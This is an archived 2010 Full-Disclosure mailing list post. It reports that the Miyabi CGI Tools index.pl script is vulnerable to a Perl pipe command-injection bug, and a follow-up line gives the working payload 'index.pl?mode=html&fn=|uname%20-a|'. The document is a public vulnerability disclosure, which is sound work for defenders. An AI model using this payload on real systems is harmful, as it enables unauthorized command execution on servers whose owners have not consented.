|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Re: [Full-disclosure] Miyabi CGI Tools index.pl command execution
From: Marshall Whittaker (marshallwhittaker
gmail.com)
Date: Tue Jun 29 2010 - 15:20:58 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
LuLz I forgot to tell how to exploit...
index.pl?mode=html&fn=|uname%20-a|
2010/6/29 Marshall Whittaker <marshallwhittaker
gmail.com>
> The Miyabi CGI Tools index.pl CGI script suffers from the pipe bug. The
> script is attached. It's all in Japanese (I think), I can't read the
> comments.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]